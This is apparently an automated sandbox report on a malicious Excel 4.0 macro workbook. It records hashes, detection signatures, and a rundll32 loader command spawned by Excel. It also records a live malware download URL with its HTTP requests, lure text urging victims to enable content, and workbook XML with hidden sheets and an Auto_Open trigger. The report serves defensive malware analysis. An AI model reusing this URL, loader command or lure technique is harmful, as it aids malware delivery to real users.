Loading ...

Play interactive tourEdit tour

Analysis Report Refusal-376547573-01212021.xlsm

Overview

General Information

Sample Name:Refusal-376547573-01212021.xlsm
Analysis ID:342882
MD5:b2a6b33f2ace5e06ce661609f7297382
SHA1:85260ad8b2fdd4d3c6b49c9f87851fd0a125e1dd
SHA256:cac44e08ba7544ff35a9863faea38680dbf7675ad2e23d7ffc82e11ae0b2da67

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected MalDoc_1
Checks for available system drives (often done to infect USB drives)
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6792 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 7108 cmdline: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sheet2.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6792, ProcessCommandLine: rundll32 ..\Flopers.GGRRDDFF,DllRegisterServer, ProcessId: 7108

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus detection for URL or domainShow sources
    Source: http://www.toteteca.com/qzkiodlofm/5555555555.jpgAvira URL Cloud: Label: malware

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: z:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: x:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: v:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: t:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: r:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: p:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: n:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: l:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: j:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: h:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: f:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: b:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: y:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: w:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: u:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: s:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: q:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: o:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: m:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: k:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: i:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: g:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: e:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: c:Jump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: a:Jump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: www.toteteca.com
    Source: global trafficTCP traffic: 192.168.2.3:49726 -> 172.107.2.98:80
    Source: global trafficTCP traffic: 192.168.2.3:49726 -> 172.107.2.98:80

    Networking:

    barindex
    Yara detected MalDoc_1Show sources
    Source: Yara matchFile source: sheet2.xml, type: SAMPLE
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /qzkiodlofm/5555555555.jpg HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.toteteca.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: www.toteteca.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.aadrm.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.cortana.ai
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.office.net
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.onedrive.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://augloop.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cdn.entity.
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://clients.config.office.net/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://config.edge.skype.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cortana.ai
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cortana.ai/api
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://cr.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dev.cortana.ai
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://devnull.onenote.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://directory.services.
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://graph.windows.net
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://graph.windows.net/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://lifecycle.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://login.windows.local
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://management.azure.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://management.azure.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://messaging.office.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://officeapps.live.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://onedrive.live.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://outlook.office.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://outlook.office365.com/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://settings.outlook.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://staging.cortana.ai
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://tasks.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 38087A14-1EB5-47B7-A8E2-322A21C03B78.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 11_ from the yellow bar above 12 13 14" @Once You have Enable Editing, please cli
    Source: Screenshot number: 4Screenshot OCR: Enable Content 15 from the yellow bar above 16 17 ' "- WHY ICANNOT OPEN THIS DOCUMENT? 19 20
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Refusal-376547573-01212021.xlsmInitial sample: EXEC
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9302"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="5" r:id="rId1"/><sheet name="Kotu" sheetId="4" state="hidden" r:id="rId2"/><sheet name="Mols" sheetId="1" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Kotu!$A$154</definedName></definedNames><calcPr calcId="144525"/></workbook>
    Source: classification engineClassification label: mal76.troj.expl.evad.winXLSM@3/10@2/2
